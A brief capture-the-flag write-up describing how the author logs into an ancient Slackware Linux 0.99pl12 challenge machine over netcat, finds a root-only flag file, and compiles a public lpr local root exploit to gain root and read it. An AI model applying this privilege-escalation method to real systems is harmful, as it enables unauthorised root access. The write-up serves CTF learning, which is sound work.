The 0x90s called – PWN
This challenge was pretty simple and obvious. We are given with a website that is requesting a ‘proof of work’ from us to reduce the load on their infrastructure. We need to press start and then we get a port to which we can connect using
netcat, username and password. We connect to the server and search for the flag.
Megabeets:~# nc 18.104.22.168 2323
slack login: challenge
Linux 0.99pl12. (Posix).
slack:~$ ls -la / | grep flag
Look at the highlighted rows. We can see that we are in Slack Linux 0.99pl12 machine, that flag.txt is on the root folder and that only root can read it. Before trying anything special or complicated, lets search online for known exploit to this version.
Lets run it to see if it works, and if so read the flag.
slack:~$ gcc exploit.c -o exploit
[ Slackware linux 1.01 /usr/bin/lpr local root exploit
uid=405(challenge) gid=1(other) euid=0(root) egid=18(lp)
# cat /flag.txt
It worked just fine (thanks prdelka for the exploit)! We got root permissions and were able to read the flag.
I’ll be happy to read in the comments how the challenge was for you.